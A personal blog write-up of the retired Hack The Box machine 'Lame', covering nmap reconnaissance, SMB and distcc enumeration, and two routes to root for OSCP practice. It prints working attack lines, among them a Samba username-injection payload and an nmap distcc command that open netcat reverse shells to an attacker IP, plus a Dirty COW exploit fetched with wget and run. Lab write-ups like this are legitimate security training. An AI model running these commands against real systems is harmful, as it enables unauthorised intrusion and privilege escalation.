Hack The Box: Lame Write-up (#1)

Hi there! This is my first write-up on HTB retired VMs. Firstly, I would like to thanks the 2 infosec professionals who are my great inspiration to write up this blog, Rana Khalil and TheCyberMentor. Please do visit their Twitter for awesome updates. I do this writeup in preparation for OSCP certification based on TJ_Null’s OSCP like VMs list.

TJ Null OSCP Like VMs List

I will first start with Linux boxes (first column) in the list from Lame to Mango and will continue to Windows boxes. This will be a series of write-ups and will continue to release new write-up whenever the list gets updated. I have included the hacking methodology in this write-up (will be included in every upcoming write-up), #1 Reconnaissance, #2 Service Enumeration, #3 Exploit and #4 Attack Strategy Map. This will help you keep track of your activity. Please enjoy the rest of the contents.

Reconnaissance

Let start with quick nmap scanning.

nmap -sC -sV -O -oA nmap/basic 10.10.10.3
  • -sC: Default nmap script
  • -sV: Service/version info
  • -O: Enable OS detection
  • -oA: Output scan results in 3 different formats

We got the following results:

  • Port 21 — Running FTP service of version 2.3.4
  • Port 22 — Running SSH service of version OpenSSH 4.7p1
  • Port 139,445 — Running SMB service of version Samba 3.0.20-Debian
Nmap quick scan result

It is always good to run a full nmap scan to leave no stone unturned. Let do that as well.

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.3
  • -p-: scan all ports from 1–65535

We got the following results:

  • Port 3632 — Running Distributed compiler daemon (distccd) of version 1. This port we didn’t find in the quick nmap scan result. So its good to run a full scan.
Nmap full scan result

The last scan we need to cover is the UDP scan. Let’s run the nmap scan for this:

nmap -sU -O -p- -oA nmap/udp 10.10.10.3

We got the following results:

Nmap UDP scan result

As we can see all the ports are either closed or filtered.

Now, we have 4 potential ports we can go for the next step to enumerate them.

Service Enumeration

In this phase, we enumerate ports and its service to find if anything misconfigured or version vulnerability exists.

Port 21 vsftpd 2.3.4

A quick google search revealed that this version of FTP software is vulnerable to Remote Command Execution and most the exploitation done via Metasploit Framework. We not going for this method to use to keep ourself adhere to OSCP exam standard. From the basic nmap scan result, we can see “anonymous access is allowed”. So let’s try.

FTP anonymous access

Nothing much interesting we can find here. Let’s use nmap vulnerable service script to check if this version of FTP service is vulnerable. The default location of the script can be found here:

ls -1 /usr/share/nmap/scripts/ftp*

Let execute this script against our target machine on port 21.

nmap -p 21 10.10.10.3 --script ftp-vsftpd-backdoor.nse
Nmap script scan for vulnerability

The result shows this version of FTP is not vulnerable. So let’s move to the next in the list.

Port 22 OpenSSH 4.7p1

SSH service enumeration I always put as the last option when others seem to not work to open a door to the target. A quick search on this didn’t give much info. Let’s move to the next.

Port 139 and 445 Samba 3.0.20-Debian

These ports most of the time gives you anonymous access and open a door for you to the target.

Let’s try with the basic enumeration with smbclient and smbmap to list the shares and share’s permissions respectively.

smbclient -L 10.10.10.3
  • -L: Get a list of shares available on a host
Smbclient to list shares
smbmap -H 10.10.10.3
  • -H: IP of the host
Smbmap shows the share permission

Great! we have one share with read and write permission. After googled this version of Samba for its vulnerability, we found one suitable CVE which works on Linux system, CVE-2007–2447. The exploit is here. Basically there is a misconfiguration in the smb.conf file, in the username field. All we need to do is to change the username for authentication to:

username = "/=`nohup <our payload comes here>`"

We keep this in mind. Later in the exploitation phase, we will test this exploit. We proceed to the last port.

Port 3632 Distccd version 1

Google search on this port and service reveals it is vulnerable to remote code execution. Nmap has a script to check for distcc vulnerability.

Nmap script for distcc

We can confirm this by running nmap script with the following command:

nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687.nse
Nmap result shows distcc is vulnerable

Excellent! It is vulnerable. Refer to CVE-2004–2687 for more info. This can be exploited using nmap script as mentioned here.

Its time for exploit! Let’s get into the business.

Exploitation

#1 Samba

Set a Netcat listener in your Kali Linux.

nc -nlvp 4444
Netcat listener is ready

Login into Samba:

smbclient //10.10.10.3/tmp

Then logon with below code:

logon "/=`nohup nc -nv 10.10.14.3 4444 -e /bin/sh`"

Note: Please change the IP above to your Kali Linux IP.

Logon username with a payload

We successfully received a reverse shell from the Lame box.

Reverse shell

Grab the user root flag.

Root flag

Grab the user flag.

User flag

#2 Distcc

Set a Netcat listener on your Kali Linux.

nc -nlvp 4444

Execute below code in your Kali Linux.

nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc -nv 10.10.14.3 4444 -e /bin/bash'"

Now we got a reverse shell from the Lame box. If you notice, the user is daemon.

Reverse shell

We need to escalate this unprivileged user to root. Alright, things getting interesting. I googled for kernel 2.6.24 and got this exploit from Exploit DB.

The exploit can be downloaded from searchsploit in your Kali Linux.

Searchsploit for exploit code

Set a simple python web server (default port 8000) in your Kali Linux to download this exploit to Lame box.

python3 -m http.server

From Lame box download this exploit.

wget http://10.10.14.3:8000/40839.c

Note: Please change the above IP to your Kali Linux IP.

Next, #1 you need to compile this code as mentioned in the exploit. #2 you need to execute the newly created binary.

Exploit code

So let’s compile:

gcc -pthread 40839.c -o dirty -lcrypt

Execute the newly created binary.

./dirty <your new password type here>

So what happened here? If you have read this exploit, it says basically it backup the existing passwd file to /tmp/ directory and then it creates a new passwd file with a username ‘firefart’ with root privilege.

The code is successfully executed. We can confirm this by ssh from our Kali Linux to the Lame box as ‘firefart’ user.

ssh firefart@10.10.10.3
Ssh into Lame box

We have solved this machine in 2 different ways. Nice!

Attack Strategy Map

Strategy map

Thank you for reading. Next box is the Beep.

--

--

--

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Medical Malpractice- Surgery Errors — Sinclairlawoffices

The Importance of Data Privacy as COVID-19 Forces the World Online

UnboredBot Privacy Policy

Announcement: Closing of Destruction Mining Function for HOS

📢🔥 @DeBankDeFi listed this week on @thedapplist V2 🎉

gpsd/gpsctl cross compile and usage

{UPDATE} Quixo board game Hack Free Resources Generator

Galaxy Nodes Is Now KYC Approved By Cyberscope

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Joshua Surendran

Joshua Surendran

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.

More from Medium

Manage Traffic with Two Routers on Windows PC

CS371p Spring 2022 Blog # 3: Jeffrey Liu

5G Network in a Box for Testing & Simulation Use Cases | Test & Validate 5G-Ready solutions On the…

How to stop software supply chain attacks | Licel